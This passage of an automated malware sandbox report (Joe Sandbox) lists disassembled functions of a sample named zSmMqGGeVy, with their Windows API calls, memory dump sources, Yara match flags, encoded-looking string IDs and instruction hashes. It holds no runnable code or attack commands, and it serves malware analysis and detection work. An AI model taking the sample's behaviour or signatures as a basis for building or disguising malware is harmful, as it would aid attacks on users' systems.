                                                    • Part of subcall function 10006928: IsProcessorFeaturePresent.KERNEL32(00000017,10006F58,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006944
                                                    • Part of subcall function 10005879: IsProcessorFeaturePresent.KERNEL32(00000017,1000584B,?,?,00000000,10001F4F,?,00000016,?,10005858,00000000,00000000,00000000,00000000,00000000,10006999), ref: 1000587B
                                                    • Part of subcall function 10005879: GetCurrentProcess.KERNEL32(C0000417), ref: 1000589E
                                                    • Part of subcall function 10005879: TerminateProcess.KERNEL32(00000000), ref: 100058A5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FeaturePresentProcessProcessor_free$CurrentTerminate
                                                  • String ID: `0
                                                  • API String ID: 1729132349-3674772010
                                                  • Opcode ID: 3a8ca4b1f83dae6a6342a3c26cafa7bfedda3c5115151024341f1082e83735b7
                                                  • Instruction ID: 96f9824940e19e676ffddcbf318cd994e8a5680d720d95f1860c28c085213dd1
                                                  • Opcode Fuzzy Hash: 3a8ca4b1f83dae6a6342a3c26cafa7bfedda3c5115151024341f1082e83735b7
                                                  • Instruction Fuzzy Hash: FC21B079B04203ABFB04CEA4CC45AAA77EAEF846D0F254069F8059718EEB72DA01C750
                                                  Function 00401330 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                    • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                  • __Init_thread_footer.LIBCMT ref: 004013BB
                                                    • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                    • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                    • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: FEKN$NE]D
                                                  • API String ID: 2296764815-517842756
                                                  • Opcode ID: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                  • Instruction ID: bb411daeb84ba6cc8782813aab56c5dc80a7b29e6052d91cba9c4b608feb04e2
                                                  • Opcode Fuzzy Hash: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
                                                  • Instruction Fuzzy Hash: 51215C30B00245CBD720CF29E846BA977B0FB95304F94427AD8542B7A3DBB92586C7DD
                                                  Function 00E91597 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00E993D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E993E2
                                                    • Part of subcall function 00E993D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E9941F
                                                  • __Init_thread_footer.LIBCMT ref: 00E91622
                                                    • Part of subcall function 00E9938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E99397
                                                    • Part of subcall function 00E9938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E993CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: FEKN$NE]D
                                                  • API String ID: 4132704954-517842756
                                                  • Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                  • Instruction ID: b4c38075595d91eb947f55b33b401d60082f5dcf1bd9d2ca75f58d62163b580a
                                                  • Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
                                                  • Instruction Fuzzy Hash: 86215A70B00345CBDB20CF28E846BA877A0FF95304F9452A9D8142B663EBB52586C7CE
                                                  Function 00407CC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                    • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                  • __Init_thread_footer.LIBCMT ref: 00407D2E
                                                    • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                    • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                    • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: CD^O$_DC[
                                                  • API String ID: 2296764815-3597986494
                                                  • Opcode ID: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                  • Instruction ID: 8bf2ad3165393ed28199ca71651b1e02a490a28405ec2f0c6d2e7b73ba48d91c
                                                  • Opcode Fuzzy Hash: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
                                                  • Instruction Fuzzy Hash: 1C012630F002059BC720EF6AAD0196973B4FB59300B84017AE5146B282E77899428BDE
                                                  Function 00407700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                    • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                  • __Init_thread_footer.LIBCMT ref: 0040776E
                                                    • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                    • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                    • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: CD^O$_DC[
                                                  • API String ID: 2296764815-3597986494
                                                  • Opcode ID: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                  • Instruction ID: 44c7e97e152ec1ca5567fde67ff81d8d8e81e117548a1af78ec12ab7f1e6b2a3
                                                  • Opcode Fuzzy Hash: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
                                                  • Instruction Fuzzy Hash: 64012670F002089BC720FF69AD41A5973B0E708350F80827EE5196B292EB786941CBCA
                                                  Function 00E97967 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00E993D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E993E2
                                                    • Part of subcall function 00E993D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E9941F
                                                  • __Init_thread_footer.LIBCMT ref: 00E979D5
                                                    • Part of subcall function 00E9938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E99397
                                                    • Part of subcall function 00E9938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E993CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: CD^O$_DC[
                                                  • API String ID: 4132704954-3597986494
                                                  • Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                  • Instruction ID: 4a1f778a3c17813f6b29ea082cffccee8d426e8aacc8e200ea3af0cbf543857b
                                                  • Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
                                                  • Instruction Fuzzy Hash: 0F01D670B003088BCB20FFADAD4265D73B4FB04310F9192AEE51967292D7755945CBC9
                                                  Function 00E97F27 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00E993D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E993E2
                                                    • Part of subcall function 00E993D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E9941F
                                                  • __Init_thread_footer.LIBCMT ref: 00E97F95
                                                    • Part of subcall function 00E9938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E99397
                                                    • Part of subcall function 00E9938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E993CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: CD^O$_DC[
                                                  • API String ID: 4132704954-3597986494
                                                  • Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                  • Instruction ID: d656048bb623f40295e0a238cfbbc0fa62e17fbe1c975043e8b40affecc14cb0
                                                  • Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
                                                  • Instruction Fuzzy Hash: 0501D670B003058BCB20EF69BD4299D73A5FB44310B941179E52967242D77499458BD9
                                                  Function 004070B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                    • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                  • __Init_thread_footer.LIBCMT ref: 00407119
                                                    • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                    • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                    • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: DCDO$EDO*
                                                  • API String ID: 2296764815-3480089779
                                                  • Opcode ID: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                  • Instruction ID: 6e88f7cd3849569d85f07cd18ee47690fbb1a730dcdea08f10a2250dba35ba50
                                                  • Opcode Fuzzy Hash: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
                                                  • Instruction Fuzzy Hash: 1F0186B0F01208AFC710DF55E98255DB7B0E705304F90457ADA15AB3D1DB386D95CB8D
                                                  Function 004071C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                                    • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                                  • __Init_thread_footer.LIBCMT ref: 00407229
                                                    • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                                    • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                                    • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: DCDO$^]E*
                                                  • API String ID: 2296764815-2708296792
                                                  • Opcode ID: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                  • Instruction ID: 8efc7060af64cb8acb1af25de2c4b339d239c6825e953d18f5e204f1a235d67b
                                                  • Opcode Fuzzy Hash: da9be0c5e5273d7ee2d012b34ad58f6f2e7d462380927887947c71f03af37cc5
                                                  • Instruction Fuzzy Hash: 8F016D70F002089BC720EF68E94295DB7B0EB08304F9441BEE919A7396DB3969158BCE
                                                  Function 00E97317 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00E993D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E993E2
                                                    • Part of subcall function 00E993D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E9941F
                                                  • __Init_thread_footer.LIBCMT ref: 00E97380
                                                    • Part of subcall function 00E9938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E99397
                                                    • Part of subcall function 00E9938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E993CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: DCDO$EDO*
                                                  • API String ID: 4132704954-3480089779
                                                  • Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                  • Instruction ID: 602f9e14e0a634b91a37a684a28b55f101e6bab71df34c8a01559c3e3f56f1c8
                                                  • Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
                                                  • Instruction Fuzzy Hash: 3A0186B0B113089FCB10DF68E98259CB7B0EB05314F905179DA1567391D7346985CB89
                                                  Function 00E97427 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00E993D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E993E2
                                                    • Part of subcall function 00E993D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E9941F
                                                  • __Init_thread_footer.LIBCMT ref: 00E97490
                                                    • Part of subcall function 00E9938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00E99397
                                                    • Part of subcall function 00E9938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00E993CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: DCDO$^]E*
                                                  • API String ID: 4132704954-2708296792
                                                  • Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                  • Instruction ID: 56ed54d924e684f797215b3bbb9bc4b87111a337f5aa19cdf21d5a1eefe13d7c
                                                  • Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
                                                  • Instruction Fuzzy Hash: BF018170B002089FCB20EFA8E95359CBBF4EB04700F94417AD91967392DB35A9158BD9
                                                  Function 10006368 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: `0
                                                  • API String ID: 269201875-3674772010
                                                  • Opcode ID: 5078698d2abe3b1fdb1891182b495dbc906b0e89d0e572ab4a00d2e6a8bc271b
                                                  • Instruction ID: fac8eebfbd27b01136f76e2cc515f45fe441570489254ee9cd35050f4ce8a31d
                                                  • Opcode Fuzzy Hash: 5078698d2abe3b1fdb1891182b495dbc906b0e89d0e572ab4a00d2e6a8bc271b
                                                  • Instruction Fuzzy Hash: FDE0E536A0952149F315D739AC0125F25D3EBC56F1B210326F820971E9DFB09B41D2E2